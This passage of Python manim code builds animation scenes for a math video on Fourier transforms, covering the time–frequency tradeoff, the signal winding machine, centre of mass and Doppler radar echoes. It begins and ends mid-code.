time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
# x-coordinate of this point represents log(a)
# where the bell curve component of the signal
# is exp(-a*(x**2))
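# (change_width_anim below maps a visual width w to a = 2/w**2, so the envelope
# is exp(-2*(x/w)**2); the tracker interpolates along log(a), which is why the
# width animates smoothly across orders of magnitude)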
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
self.play(ShowCreation(graph, rate_func=linear))
self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
step_size = 0.001
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
circle_plane.target.main_lines.set_stroke(width = 2)
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
return self.get_graph(self.get_single_pulse_function(x), **kwargs)
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
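# Cosine carrier (argument 2*freq*(t - x)) under a Gaussian envelope clipped
# at 0.5, which gives the pulse a flat top; a larger frequency_spread_factor
# means a slower decay, i.e. a longer pulse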
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
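# Rough numeric check of the on-screen formula (illustrative values, not from
# the video): a target closing at v = 250 m/s with c ~ 3e8 m/s gives
# v/c ~ 8.3e-7, so a 3 GHz pulse would come back shifted by roughly
# 3e9 * 8.3e-7 ~ 2.5 kHz. (A round-trip radar echo actually picks up about
# twice this factor, but the scene keeps the simpler one-way form.)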
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
